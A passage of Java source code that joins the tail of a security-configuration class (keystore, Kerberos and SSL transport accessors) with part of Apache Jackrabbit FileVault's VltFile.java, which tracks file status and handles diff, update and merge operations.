getTruststoreSigPublicKeyAlias() { final String tsPublicKeyAlias = map.get(ParameterState.SEC_TRUSTSTORE_SIG_PUBLIC_KEY_ALIAS). asString(); if (tsPublicKeyAlias != null && !tsPublicKeyAlias.isEmpty()) { return tsPublicKeyAlias; } return null; } public void setTruststoreSigPublicKeyAlias(String keyAlias) { map.setParameter(ParameterState.SEC_TRUSTSTORE_SIG_PUBLIC_KEY_ALIAS, keyAlias); } public String getPasswordFile() { return map.get(ParameterState.SEC_PASSWORD_FILE).asString(); } public void setPasswordFile(String passwordFile) { map.setParameter(ParameterState.SEC_PASSWORD_FILE, passwordFile); } public String getPasswordClass() { return map.get(ParameterState.SEC_PASSWORD_CLASS).asString(); } public void setPasswordClass(String passwordClass) { map.setParameter(ParameterState.SEC_PASSWORD_CLASS, passwordClass); } public String getWalletDir() { return map.get(ParameterState.SEC_WALLET_DIR).asString(); } public void setWalletDir(String walletDir) { map.setParameter(ParameterState.SEC_WALLET_DIR, walletDir); } public String getInternalAuth() { return map.get(ParameterState.SEC_INTERNAL_AUTH).asString(); } public void setInternalAuth(String internalAuth) { map.setParameter(ParameterState.SEC_INTERNAL_AUTH, internalAuth); } public String getCertMode() { return map.get(ParameterState.SEC_CERT_MODE).asString(); } public void setCertMode(String certMode) { map.setParameter(ParameterState.SEC_CERT_MODE, certMode); } public String getKeystorePasswordAlias() { final String ksPwdAlias = map.get(ParameterState.SEC_KEYSTORE_PWD_ALIAS).asString(); if (ksPwdAlias != null && ksPwdAlias.length() > 0) { return ksPwdAlias; } return null; } public void setKeystorePasswordAlias(String alias) { map.setParameter(ParameterState.SEC_KEYSTORE_PWD_ALIAS, alias); } public String getSignatureAlgorithm() { return map.get(ParameterState.SEC_SIGNATURE_ALGO).asString(); } public void setSignatureAlgorithm(String sigAlgo) { map.setParameter(ParameterState.SEC_SIGNATURE_ALGO, sigAlgo); } /* Kerberos-related accessors */ public String getKerberosServiceName() { return map.getOrDefault( ParameterState.SEC_KERBEROS_SERVICE_NAME).asString(); } public void setKerberosServiceName(String serviceName) { map.setParameter(ParameterState.SEC_KERBEROS_SERVICE_NAME, serviceName); } public String getKerberosInstanceName() { return map.get(ParameterState.SEC_KERBEROS_INSTANCE_NAME).asString(); } public void setKerberosInstanceName(String instanceName) { map.setParameter(ParameterState.SEC_KERBEROS_INSTANCE_NAME, instanceName); } public String getKerberosRealmName() { return map.get(ParameterState.SEC_KERBEROS_REALM_NAME).asString(); } public void setKerberosRealmName(String realmName) { map.setParameter(ParameterState.SEC_KERBEROS_REALM_NAME, realmName); } public String getKerberosConfFile() { return map.get(ParameterState.SEC_KERBEROS_CONFIG_FILE).asString(); } public void setKerberosConfFile(String confFile) { map.setParameter(ParameterState.SEC_KERBEROS_CONFIG_FILE, confFile); } public String getKerberosKeytabFile() { return map.get(ParameterState.SEC_KERBEROS_KEYTAB_FILE).asString(); } public void setKerberosKeytabFile(String keytabFile) { map.setParameter(ParameterState.SEC_KERBEROS_KEYTAB_FILE, keytabFile); } public KrbPrincipalInfo getKerberosPrincipalInfo() { return new KrbPrincipalInfo(getKerberosRealmName(), getKerberosServiceName(), getKerberosInstanceName()); } /* Transport-related accessors */ public String getTransType(String transport) { final ParameterMap transportMap = requireTransportMap(transport); return getTransType(transportMap); } public String getTransType(final ParameterMap transportMap) { return transportMap.get(ParameterState.SEC_TRANS_TYPE).asString(); } public void setTransType(String transport, String transType) { final ParameterMap transportMap = requireTransportMap(transport); setTransType(transportMap, transType); } public void setTransType(ParameterMap transportMap, String transType) { transportMap.setParameter(ParameterState.SEC_TRANS_TYPE, transType); } /* Factory is applicable only if transport type == factory */ public String getTransFactory(String transport) { final ParameterMap transportMap = requireTransportMap(transport); return getTransFactory(transportMap); } public String getTransFactory(ParameterMap transportMap) { return transportMap.get(ParameterState.SEC_TRANS_FACTORY).asString(); } public void setTransFactory(String transport, String factory) { final ParameterMap transportMap = requireTransportMap(transport); setTransFactory(transportMap, factory); } public void setTransFactory(ParameterMap transportMap, String factory) { transportMap.setParameter(ParameterState.SEC_TRANS_FACTORY, factory); } public String getTransServerKeyAlias(String transport) { final ParameterMap transportMap = requireTransportMap(transport); return getTransServerKeyAlias(transportMap); } public String getTransServerKeyAlias(ParameterMap transportMap) { return transportMap.get(ParameterState.SEC_TRANS_SERVER_KEY_ALIAS). asString(); } public void setTransServerKeyAlias(String transport, String alias) { final ParameterMap transportMap = requireTransportMap(transport); setTransServerKeyAlias(transportMap, alias); } public void setTransServerKeyAlias(ParameterMap transportMap, String alias) { transportMap.setParameter( ParameterState.SEC_TRANS_SERVER_KEY_ALIAS, alias); } public String getTransClientKeyAlias(String transport) { final ParameterMap transportMap = requireTransportMap(transport); return getTransClientKeyAlias(transportMap); } public String getTransClientKeyAlias(ParameterMap transportMap) { return transportMap. get(ParameterState.SEC_TRANS_CLIENT_KEY_ALIAS).asString(); } public void setTransClientKeyAlias(String transport, String alias) { final ParameterMap transportMap = requireTransportMap(transport); setTransClientKeyAlias(transportMap, alias); } public void setTransClientKeyAlias(ParameterMap transportMap, String alias) { transportMap.setParameter( ParameterState.SEC_TRANS_CLIENT_KEY_ALIAS, alias); } public String getTransAllowCipherSuites(String transport) { final ParameterMap transportMap = requireTransportMap(transport); return getTransAllowCipherSuites(transportMap); } public String getTransAllowCipherSuites(ParameterMap transportMap) { return transportMap.get( ParameterState.SEC_TRANS_ALLOW_CIPHER_SUITES).asString(); } public void setTransAllowCipherSuites(String transport, String allowedSuites) { final ParameterMap transportMap = requireTransportMap(transport); setTransAllowCipherSuites(transportMap, allowedSuites); } public void setTransAllowCipherSuites(ParameterMap transportMap, String allowedSuites) { transportMap.setParameter( ParameterState.SEC_TRANS_ALLOW_CIPHER_SUITES, allowedSuites); } public String getTransAllowProtocols(String transport) { final ParameterMap transportMap = requireTransportMap(transport); return getTransAllowProtocols(transportMap); } public String getTransAllowProtocols(ParameterMap transportMap) { return transportMap.getOrDefault( ParameterState.SEC_TRANS_ALLOW_PROTOCOLS).asString(); } public void setTransAllowProtocols(String transport, String allowedProtocols) { final ParameterMap transportMap = requireTransportMap(transport); setTransAllowProtocols(transportMap, allowedProtocols); } public void setTransAllowProtocols(ParameterMap transportMap, String allowedProtocols) { transportMap.setParameter( ParameterState.SEC_TRANS_ALLOW_PROTOCOLS, allowedProtocols); } public String getTransClientAllowCipherSuites(String transport) { final ParameterMap transportMap = requireTransportMap(transport); return getTransClientAllowCipherSuites(transportMap); } public String getTransClientAllowCipherSuites(ParameterMap transportMap) { return transportMap.get( ParameterState.SEC_TRANS_CLIENT_ALLOW_CIPHER_SUITES).asString(); } public void setTransClientAllowCipherSuites(String transport, String allowedSuites) { final ParameterMap transportMap = requireTransportMap(transport); setTransClientAllowCipherSuites(transportMap, allowedSuites); } public void setTransClientAllowCipherSuites(ParameterMap transportMap, String allowedSuites) { transportMap.setParameter( ParameterState.SEC_TRANS_CLIENT_ALLOW_CIPHER_SUITES, allowedSuites); } public String getTransClientAllowProtocols(String transport) { final ParameterMap transportMap = requireTransportMap(transport); return getTransClientAllowProtocols(transportMap); } public String getTransClientAllowProtocols(ParameterMap transportMap) { return transportMap.get( ParameterState.SEC_TRANS_CLIENT_ALLOW_PROTOCOLS).asString(); } public void setTransClientAllowProtocols(String transport, String allowedProtocols) { final ParameterMap transportMap = requireTransportMap(transport); setTransClientAllowProtocols(transportMap, allowedProtocols); } public void setTransClientAllowProtocols(ParameterMap transportMap, String allowedProtocols) { transportMap.setParameter( ParameterState.SEC_TRANS_CLIENT_ALLOW_PROTOCOLS, allowedProtocols); } public String getTransClientIdentityAllowed(String transport) { final ParameterMap transportMap = requireTransportMap(transport); return getTransClientIdentityAllowed(transportMap); } public String getTransClientIdentityAllowed( ParameterMap transportMap) { return transportMap.get( ParameterState.SEC_TRANS_CLIENT_IDENT_ALLOW).asString(); } public void setTransClientIdentityAllowed(String transport, String identAllowed) { final ParameterMap transportMap = requireTransportMap(transport); setTransClientIdentityAllowed(transportMap, identAllowed); } public void setTransClientIdentityAllowed(ParameterMap transportMap, String identAllowed) { transportMap.setParameter( ParameterState.SEC_TRANS_CLIENT_IDENT_ALLOW, identAllowed); } public boolean getTransClientAuthRequired(String transport) { final ParameterMap transportMap = requireTransportMap(transport); return getTransClientAuthRequired(transportMap); } public boolean getTransClientAuthRequired(ParameterMap transportMap) { return transportMap.get( ParameterState.SEC_TRANS_CLIENT_AUTH_REQUIRED).asBoolean(); } public void setTransClientAuthRequired(String transport, boolean authRequired) { final ParameterMap transportMap = requireTransportMap(transport); setTransClientAuthRequired(transportMap, authRequired); } public void setTransClientAuthRequired(ParameterMap transportMap, boolean authRequired) { transportMap.setParameter(ParameterState.SEC_TRANS_CLIENT_AUTH_REQUIRED, Boolean.toString(authRequired)); } public String getTransServerIdentityAllowed(String transport) { final ParameterMap transportMap = requireTransportMap(transport); return getTransServerIdentityAllowed(transportMap); } public String getTransServerIdentityAllowed( ParameterMap transportMap) { return transportMap.get( ParameterState.SEC_TRANS_SERVER_IDENT_ALLOW).asString(); } public void setTransServerIdentityAllowed(String transport, String identAllowed) { final ParameterMap transportMap = requireTransportMap(transport); setTransServerIdentityAllowed(transportMap, identAllowed); } public void setTransServerIdentityAllowed(ParameterMap transportMap, String identAllowed) { transportMap.setParameter( ParameterState.SEC_TRANS_SERVER_IDENT_ALLOW, identAllowed); } /* * Utility code */ /** * Return the standard RMI socket policy. * * @return the standard RMI socket policy */ public RMISocketPolicy getRMISocketPolicy() { if (clientRMISocketPolicy == null) { throw new IllegalStateException( "No RMI socket policy is in force"); } return clientRMISocketPolicy; } /** * Return the trusted RMI socket policy. * * @return the trusted RMI socket policy, if available, else null */ public RMISocketPolicy getTrustedRMISocketPolicy() { return trustedRMISocketPolicy; } /** * Called by SN components to ensure that an appropriate RMISocketPolicy * is in place prior to creating the registryCSF. * @throws IllegalStateException if the security configuration is invalid */ public void initRMISocketPolicies(Logger logger) throws IllegalStateException { if (isSecure()) { useRMISocketPolicies(logger); } else { useRMISocketPolicyDefaults(); } } /** * Returns a set of properties that enables client communication with * the server. */ public Properties getClientAccessProps() { final String transportName = "client"; final ParameterMap transMap = getTransportMap(transportName); final RMISocketPolicyBuilder spb = (RMISocketPolicyBuilder) makeTransportFactory(transportName, transMap, RMISocketPolicyBuilder.class); final Properties props = spb.getClientAccessProperties(this, transMap); final String transportType = transMap.get(ParameterState.SEC_TRANS_TYPE).asString(); if (transportType != null && !transportType.isEmpty()) { props.setProperty(KVSecurityConstants.TRANSPORT_PROPERTY, transportType); } return props; } /** * Called to ensure that an appropriate RMISocketPolicy is in place prior * to creating the registryCSF. */ private void useRMISocketPolicies(Logger logger) throws IllegalStateException { final RMISocketPolicy clientSocketPolicy = createClientRMISocketPolicy(logger); ClientSocketFactory.setRMIPolicy(clientSocketPolicy); clientRMISocketPolicy = clientSocketPolicy; final RMISocketPolicy trustedSocketPolicy = createTrustedRMISocketPolicy(logger); if (trustedSocketPolicy != null) { /* No need to supply a store context here */ trustedSocketPolicy.prepareClient(null /* storeContext */, null /* clientId */); trustedRMISocketPolicy = trustedSocketPolicy; } } private ParameterMap requireTransportMap(String transport) { final ParameterMap transportMap = transportMaps.get(transport); if (transportMap == null) { throw new IllegalStateException( "Transport " + transport + " does not exist"); } return transportMap; } /** * Called to ensure that an appropriate RMISocketPolicy is in place prior * to creating the registryCSF when there is no security configuration in * place. */ private void useRMISocketPolicyDefaults() { clientRMISocketPolicy = makeDefaultRMISocketPolicy(); ClientSocketFactory.setRMIPolicy(clientRMISocketPolicy); trustedRMISocketPolicy = null; } /** * Return the RMI socket policy used for normal communication between * components. */ private RMISocketPolicy createClientRMISocketPolicy(Logger logger) throws IllegalStateException { return makeRMISocketPolicy("client", logger); } /** * Return the RMI socket policy used by components when communicating * with other components in trusted mode. */ private RMISocketPolicy createTrustedRMISocketPolicy(Logger logger) throws IllegalStateException { final RMISocketPolicy internalPolicy = makeRMISocketPolicy("internal", logger); if (!transportSSLEnabled("internal")) { return internalPolicy; } return internalPolicy.isTrustCapable() ? internalPolicy : null; } private static RMISocketPolicy makeDefaultRMISocketPolicy() { return new ClearSocketPolicy(); } /** * Construct an RMISocketPolicy for the specified transportName. * @param transportName The name of a transport, which must be * present in the list of transports * @return An instance of RMISocketPolicy */ private RMISocketPolicy makeRMISocketPolicy(String transportName, Logger logger) throws IllegalStateException { final ParameterMap transportParams = findTransportParams(transportName); final RMISocketPolicyBuilder spb = (RMISocketPolicyBuilder) makeTransportFactory(transportName, transportParams, RMISocketPolicyBuilder.class); try { return spb.makeSocketPolicy(this, transportParams, logger); } catch (Exception e) { throw new IllegalStateException( "Error constructing RMISocketPolicy using transport class " + "for transport " + transportName, e); } } /** * Construct a RepNetConfigBuilder for the specified transport * @param transportParams The transport configuration parameters * @return An instance of RepNetConfigBuilder */ private RepNetConfigBuilder makeRepNetConfigBuilder( ParameterMap transportParams) throws IllegalStateException { final String transportName = transportParams.getName(); return (RepNetConfigBuilder) makeTransportFactory(transportName, transportParams, RepNetConfigBuilder.class); } /** * Locate the ParameterMap for the specified transportName. * * @param transportName The name of a transport, which must be * present in the list of transports * @return The parameter map for the transport * @throw ConfigurationError if the transport parameter map cannot * be found. */ private ParameterMap findTransportParams(String transportName) throws IllegalStateException { /* Find the transport parameter map */ final ParameterMap transportParams = transportMaps.get(transportName); if (transportParams == null) { throw new IllegalStateException( "transport name " + transportName + " does not exist in the configuration"); } return transportParams; } /** * Construct a transport fractory for the specified transportName. * No assumption is made as to what purpose the transport factory is * being created. * * @param transportName The name of a transport, which must be * present in the list of transports * @param transportParams The parameter map for the transport * @param factoryInterfaceClass A class or interface to which the * resulting object must be castable. * @return An instance of of the factory for the transport name */ private Object makeTransportFactory(String transportName, ParameterMap transportParams, Class<?> factoryInterfaceClass) throws IllegalStateException { /* * Get the transport factory class name from the transport * parameter map */ final String transportType = getTransType(transportParams); String transportFactory = null; if (transportType == null || transportType.isEmpty() || TRANS_TYPE_FACTORY.equals(transportType)) { transportFactory = getTransFactory(transportParams); } else { if (TRANS_TYPE_SSL.equals(transportType)) { transportFactory = SSLTransport.class.getName(); } else if (TRANS_TYPE_CLEAR.equals(transportType)) { transportFactory = ClearTransport.class.getName(); } else { throw new IllegalStateException( "Transport " + transportName + " has an unrecognized transportType: " + transportType); } } if (transportFactory == null) { throw new IllegalStateException( "Transport " + transportName + " has no transportFactory parameter specified"); } /* * Resolve the transport factory class */ Class<?> factoryClass = null; try { factoryClass = Class.forName(transportFactory); } catch (Exception e) { throw new IllegalStateException( "Error resolving transport class " + transportFactory + " for transport " + transportName, e); } /* * Get an instance of the factory class. It must have an accessible * no-argument constructor. */ Object factoryObject = null; try { factoryObject = factoryClass.getDeclaredConstructor().newInstance(); } catch (Exception e) { throw new IllegalStateException( "Error instantiating transport class " + transportFactory + " for transport " + transportName, e); } /* * Check that the class must implements the desired interface. */ if (!factoryInterfaceClass.isInstance(factoryObject)) { throw new IllegalStateException( "Transport factory class " + transportFactory + " for transport " + transportName + " does not implement " + factoryInterfaceClass.getName()); } return factoryObject; } /** * Get the set of JE properties needed to construct the * ReplicationNetworkConfig for JE HA. */ public Properties getJEHAProperties() { final ParameterMap transportParams = findTransportParams("ha"); if (transportParams == null) { return new Properties(); } final RepNetConfigBuilder builder = makeRepNetConfigBuilder(transportParams); return builder.makeChannelProperties(this, transportParams); } /** * The class contains service principal information. This class used for * passing principal information via * StorageNodeAgentAPI.getKerberosPrincipalInfo */ public static class KrbPrincipalInfo implements Serializable { private static final long serialVersionUID = 1L; private final String realmName; private final String serviceName; private final String instanceName; KrbPrincipalInfo(String realmName, String serviceName, String instanceName) { this.realmName = realmName; this.serviceName = serviceName; this.instanceName = instanceName; } public String getRealmName() { return realmName; } public String getServiceName() { return serviceName; } public String getInstanceName() { return instanceName; } } }
apache/jackrabbit-filevault
35,823
vault-vlt/src/main/java/org/apache/jackrabbit/vault/vlt/VltFile.java
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.jackrabbit.vault.vlt; import java.io.BufferedReader; import java.io.File; import java.io.FileInputStream; import java.io.FileReader; import java.io.IOException; import java.io.InputStreamReader; import java.io.OutputStreamWriter; import java.io.PrintStream; import java.io.Reader; import java.io.Writer; import java.util.Locale; import java.util.Properties; import org.apache.commons.io.FileUtils; import org.apache.jackrabbit.vault.fs.VaultFileCopy; import org.apache.jackrabbit.vault.fs.api.VaultFile; import org.apache.jackrabbit.vault.util.Constants; import org.apache.jackrabbit.vault.util.LineOutputStream; import org.apache.jackrabbit.vault.util.MD5; import org.apache.jackrabbit.vault.util.MimeTypes; import org.apache.jackrabbit.vault.util.PathUtil; import org.apache.jackrabbit.vault.util.diff.DiffWriter; import org.apache.jackrabbit.vault.util.diff.Document; import org.apache.jackrabbit.vault.util.diff.DocumentDiff; import org.apache.jackrabbit.vault.util.diff.DocumentDiff3; import org.apache.jackrabbit.vault.util.diff.DocumentSource; import org.apache.jackrabbit.vault.util.diff.FileDocumentSource; import org.apache.jackrabbit.vault.util.diff.Hunk3; import org.apache.jackrabbit.vault.util.diff.LineElementsFactory; import org.apache.jackrabbit.vault.vlt.meta.MetaFile; import org.apache.jackrabbit.vault.vlt.meta.MetaFileDocSource; import org.apache.jackrabbit.vault.vlt.meta.VltEntry; import org.apache.jackrabbit.vault.vlt.meta.VltEntryInfo; /** * {@code VltFile}... * */ public class VltFile implements DocumentSource { public static final String PROP_CONTENT_TYPE = "vlt:mime-type"; /** * Possible state of this file */ public enum State { CLEAN (" "), ADDED ("A"), CONFLICTED ("C"), DELETED ("D"), IGNORED ("I"), MODIFIED ("M"), REPLACED ("R"), UNKNOWN("?"), MISSING ("!"), OBSTRUCTED ("~"), VOID (" "); public final String letter; private State(String letter) { this.letter = letter; } public String toString() { return name().toLowerCase(Locale.ROOT) + " (" + letter + ")"; } } private final VltDirectory parent; private final File file; private final String name; private VltEntry entry; public VltFile(VltDirectory parent, String name, VltEntry entry) throws VltException { this.parent = parent; this.name = name; this.entry = entry; this.file = new File(parent.getDirectory(), name); } public Properties getProperties() throws VltException { Properties props = new Properties(); if (entry != null) { VltEntryInfo info = entry.work(); String ct = info.getContentType(); if (ct != null) { props.put(PROP_CONTENT_TYPE, ct); } } return props; } public String getProperty(String name) throws VltException { if (entry != null) { VltEntryInfo info = entry.work(); if (name.equals(PROP_CONTENT_TYPE)) { return info.getContentType(); } } return null; } public void setProperty(String name, String value) throws VltException { if (entry == null) { throw error("Can't set property to non controlled file."); } VltEntryInfo info = entry.work(); if (info == null) { throw error("Can't set property to non controlled file."); } if (name.equals(PROP_CONTENT_TYPE)) { if (!file.isDirectory()) { // silently ignore directories info.setContentType(value); parent.getContext().printMessage(this, name + "=" + value); } } else { throw error("Generic properies not supported, yet"); } } public State getStatus() throws VltException { State state = State.VOID; if (entry == null) { if (file.exists()) { // special check for jcr_root if (file.equals(parent.getContext().getExportRoot().getJcrRoot())) { state = State.CLEAN; } else { state = State.UNKNOWN; } } else { state = State.VOID; } } else { switch (entry.getState()) { case CLEAN: if (file.exists()) { if (file.isDirectory()) { VltDirectory dir = descend(); if (dir.isControlled()) { state = State.CLEAN; } else { state = State.OBSTRUCTED; } } else { VltEntryInfo work = entry.work(); VltEntryInfo base = entry.base(); assert work != null; assert base != null; try { work.update(file, false); } catch (IOException e) { throw exception("Error while calculating status.", e); } state = work.isSame(base) ? State.CLEAN : State.MODIFIED; } } else { state = State.MISSING; } break; case ADDED: if (file.exists()) { state = State.ADDED; } else { state = State.MISSING; } break; case CONFLICT: state = State.CONFLICTED; break; case DELETED: state = State.DELETED; break; } } return state; } public String getName() { return name; } public File getFile() { return file; } public String getPath() { return file.getPath(); } public MetaFile getBaseFile(boolean create) throws VltException { try { return parent.getMetaDirectory().getBaseFile(name, create); } catch (IOException e) { throw new VltException(getPath(), "Error opening base file.", e); } } public String getContentType() { if (entry != null && !file.isDirectory()) { VltEntryInfo work = entry.work(); if (work != null) { return work.getContentType(); } } return null; } /** * Checks if this file has binary content. It does not actually read the * file data but calls {@link MimeTypes#isBinary(String)} with the content * type of the work file. * @return {@code true} if this is binary */ public boolean isBinary() { return MimeTypes.isBinary(getContentType()); } public MetaFile getTmpFile() throws VltException { try { return parent.getMetaDirectory().getTmpFile(name, true); } catch (IOException e) { throw new VltException(getPath(), "Error opening tmp file.", e); } } public boolean canDescend() { return file.isDirectory(); } public VltDirectory descend() throws VltException { if (!canDescend()) { throw new VltException("Cannot descend into non directory."); } return new VltDirectory(parent.getContext(), file); } public VltEntry getEntry() { return entry; } public void diff() throws VltException { State state = getStatus(); if (entry == null || entry.isDirectory()) { return; } VltEntryInfo work = entry.work(); VltEntryInfo base = entry.base(); if (work == null || base == null) { return; } switch (state) { case ADDED: case CONFLICTED: case DELETED: case MODIFIED: break; case IGNORED: case MISSING: case OBSTRUCTED: case REPLACED: case UNKNOWN: case VOID: case CLEAN: return; } if (MimeTypes.isBinary(work.getContentType()) || MimeTypes.isBinary(base.getContentType())) { PrintStream s = parent.getContext().getStdout(); s.printf(Locale.ENGLISH, "Index: %s%n", getName()); s.println("==================================================================="); s.println("Cannot display: file marked as binary type."); s.printf(Locale.ENGLISH, "vlt:mime-type = %s%n", work.getContentType()); s.flush(); return; } try { // do the actual diff PrintStream s = parent.getContext().getStdout(); DiffWriter out = new DiffWriter(new OutputStreamWriter(s, Constants.ENCODING)); out.write("Index: "); out.write(getName()); out.writeNewLine(); out.write("==================================================================="); out.writeNewLine(); try (Reader r0 = getBaseFile(false) == null ? null : getBaseFile(false).getReader(); Reader r1 = file.exists() ? new InputStreamReader(FileUtils.openInputStream(file), Constants.ENCODING) : null) { Document d0 = new Document(this, LineElementsFactory.create(this, r0, false)); Document d1 = new Document(this, LineElementsFactory.create(this, r1, false)); DocumentDiff diff = d0.diff(d1); diff.write(out, 3); } out.flush(); } catch (IOException e) { throw exception("Error while writing diff.", e); } } public FileAction delete(boolean force) throws VltException { State state = getStatus(); switch (state) { case ADDED: case CONFLICTED: case MODIFIED: case REPLACED: if (!force) { parent.getContext().printMessage(this, "has local modification. use --force to delete anyway"); return FileAction.VOID; } break; case CLEAN: case MISSING: case DELETED: break; case IGNORED: case OBSTRUCTED: case UNKNOWN: case VOID: if (!force) { parent.getContext().printMessage(this, "is not under version control. use --force to delete anyway"); return FileAction.VOID; } break; } if (entry != null && entry.delete(file)) { entry = null; } return FileAction.DELETED; } public FileAction commit(VaultFile remoteFile) throws VltException { if (remoteFile == null) { return doDelete(false); } else { return doUpdate(remoteFile, false); } } public boolean revert() throws VltException { State state = getStatus(); switch (state) { case ADDED: doDelete(true); entry = null; return true; case CONFLICTED: resolved(true); // no break; case DELETED: case MISSING: case MODIFIED: doRevert(); return true; case IGNORED: case CLEAN: case OBSTRUCTED: case REPLACED: case UNKNOWN: case VOID: default: return false; } } public boolean resolved(boolean force) throws VltException { if (getStatus() != State.CONFLICTED) { return false; } if (!force) { // check if the file still contains the diff markers boolean mayContainMarker = false; try (InputStreamReader reader = new InputStreamReader(new FileInputStream(file), Constants.ENCODING); BufferedReader in = new BufferedReader(reader)) { String line; while ((line = in.readLine()) != null) { if (line.startsWith(Hunk3.MARKER_B[0]) || line.startsWith(Hunk3.MARKER_L[0]) || line.startsWith(Hunk3.MARKER_R[0]) || line.startsWith(Hunk3.MARKER_M[0])) { mayContainMarker = true; break; } } } catch (IOException e) { throw exception("Error while reading file.", e); } if (mayContainMarker) { throw error("File still contains conflict markers. use --force to force resolve."); } } // resolve entry try { entry.resolved(getTmpFile(), file, getBaseFile(false)); } catch (IOException e) { throw exception("Error while copying files.", e); } return true; } public FileAction update(VaultFile remoteFile, boolean force) throws VltException { State state = getStatus(); switch (state) { case IGNORED: case OBSTRUCTED: case REPLACED: if (!force || remoteFile == null) { throw error("update not possible. file is " + state.name().toLowerCase(Locale.ROOT) + ". " + "Specify --force to overwrite existing files."); } return doUpdate(remoteFile, false); case ADDED: if (remoteFile != null) { if (mergeableWithRemote(remoteFile) != FileAction.VOID) { throw error("Failed to add file: object of the same name already exists."); } return doUpdate(remoteFile, false); } else { return FileAction.VOID; } case CLEAN: if (remoteFile == null) { return doDelete(false); } else { if (file.isDirectory()) { // do nothing return FileAction.VOID; } else { return doUpdate(remoteFile, false); } } case CONFLICTED: if (remoteFile == null) { try { if (!entry.revertConflict(file)) { return FileAction.CONFLICTED; } } catch (IOException e) { throw exception("Error during update.", e); } // refetch status, and delete file if clean return doDelete(getStatus() != State.CLEAN); } else { try { if (!entry.revertConflict(file)) { return doMerge(remoteFile, FileAction.CONFLICTED); } else { return doMerge(remoteFile, FileAction.UPDATED); } } catch (IOException e) { throw exception("Error during update.", e); } } case DELETED: if (remoteFile == null) { // we can delete the entry since someone else deleted it as well return doDelete(false); } else { // just update base and entry, in case someone wants to revert return doUpdate(remoteFile, true); } case MISSING: if (remoteFile == null) { // if file is missing, just delete it return doDelete(false); } else { // do update entry = null; return doUpdate(remoteFile, false); } case MODIFIED: if (remoteFile == null) { // keep the file return doDelete(true); } else { return doMerge(remoteFile, FileAction.VOID); } case UNKNOWN: if (remoteFile == null) { // do nothing return FileAction.VOID; } else { // do update if (file.exists() && !force) { throw error("Failed to update: object of the same name already exists." + " Specify --force to overwrite existing files."); } return doUpdate(remoteFile, false); } case VOID: // do update return doUpdate(remoteFile, false); default: throw exception("illegal state: " + state, null); } } public FileAction status(VaultFile remoteFile) throws VltException { State state = getStatus(); switch (state) { case IGNORED: case OBSTRUCTED: case REPLACED: return FileAction.CONFLICTED; case ADDED: if (remoteFile != null) { return FileAction.CONFLICTED; } else { return FileAction.VOID; } case CLEAN: if (remoteFile == null) { return FileAction.DELETED; } else { if (file.isDirectory()) { // do nothing return FileAction.VOID; } else { return equalsToRemote(remoteFile) ? FileAction.VOID : FileAction.UPDATED; } } case CONFLICTED: // do not probe further return FileAction.CONFLICTED; case DELETED: return FileAction.VOID; case MISSING: return FileAction.ADDED; case MODIFIED: if (remoteFile == null) { return FileAction.DELETED; } else { return mergeableWithRemote(remoteFile); } case UNKNOWN: if (remoteFile == null) { // do nothing return FileAction.VOID; } else { return FileAction.UPDATED; } case VOID: return FileAction.ADDED; default: throw exception("illegal state: " + state, null); } } public FileAction add(boolean force) throws VltException { State state = getStatus(); switch (state) { case ADDED: case CLEAN: case CONFLICTED: case MISSING: case MODIFIED: case OBSTRUCTED: case REPLACED: parent.getContext().printMessage(this, "is already under version control"); break; case DELETED: parent.getContext().printMessage(this, "replace not supported yet"); break; case IGNORED: parent.getContext().printMessage(this, "failed to add. is ignored."); break; case UNKNOWN: case VOID: return doAdd(force); } return FileAction.VOID; } private FileAction doAdd(boolean force) throws VltException { assert entry == null; entry = parent.getEntries().update(getName(), null, null); VltEntryInfo work = entry.create(VltEntryInfo.Type.WORK); try { work.update(file, true); } catch (IOException e) { throw exception("Error while adding file", e); } String contentType = MimeTypes.getMimeType(file.getName(), MimeTypes.APPLICATION_OCTET_STREAM); work.setContentType(contentType); entry.put(work); return FileAction.ADDED; } private FileAction doDelete(boolean keepFile) throws VltException { // small hack to remove meta directory. should actually be somewhere else if (file.isDirectory()) { VltDirectory dir = new VltDirectory(parent.getContext(), file); dir.uncontrol(); } else { try { if (getBaseFile(false) != null) { getBaseFile(false).delete(); } } catch (IOException e) { throw new VltException(getPath(), "Error while deleting base file.", e); } } if (!keepFile) { file.delete(); } entry = null; return FileAction.DELETED; } private FileAction doMerge(VaultFile remoteFile, FileAction action) throws VltException { if (remoteFile.isDirectory()) { throw exception("Error while merging. remote is a directory.", null); } // abort merger if actions is already conflict if (action == FileAction.CONFLICTED) { return action; } MetaFile baseFile = getBaseFile(false); MetaFile tmpFile = getTmpFile(); VltEntryInfo base = entry.base(); VltEntryInfo work = entry.work(); byte[] lineFeed = MimeTypes.isBinary(remoteFile.getContentType()) ? null : LineOutputStream.LS_NATIVE; // get the remote file VaultFileCopy copy = null; boolean remoteUpdated = true; try { // first check size and last modified if (!base.checkModified(remoteFile)) { remoteUpdated = false; } else { File temp = tmpFile.openTempFile(); copy = VaultFileCopy.copy(remoteFile, temp, lineFeed); // if tmp is equal to the base one, there was no update on the server if (copy.getMd5().equals(base.getMd5())) { tmpFile.closeTempFile(tmpFile.length() >= 0); remoteUpdated = false; } else { tmpFile.closeTempFile(false); } } } catch (IOException e) { throw exception("Error while copying files.", e); } if (!remoteUpdated) { if (work.getMd5().equals(base.getMd5())) { // fix base base.setSize(work.getSize()); base.setDate(work.getDate()); return FileAction.VOID; } else if (remoteFile.lastModified() > 0) { // normal modification provided return action; } } try { // check if binary boolean remoteBT = getRemoteBinaryType(remoteFile, copy); boolean localBT = MimeTypes.isBinary(base.getContentType()); if (remoteBT || localBT) { parent.getContext().printMessage(this, "can't merge. binary content"); entry.conflict(file, baseFile, tmpFile); return FileAction.CONFLICTED; } DocumentDiff3 diff; // do a 3-way diff between the base, the local and the remote one. // we currently do not use document sources, since we don't really have // a label to provide (like rev. num, etc). try (Reader r0 = baseFile.getReader(); Reader r1 = tmpFile.getReader()) { Document baseDoc = new Document(null, LineElementsFactory.create(new MetaFileDocSource(baseFile), r0, false)); Document leftDoc = new Document(null, LineElementsFactory.create(new FileDocumentSource(file), false, Constants.ENCODING)); Document rightDoc = new Document(null, LineElementsFactory.create(new 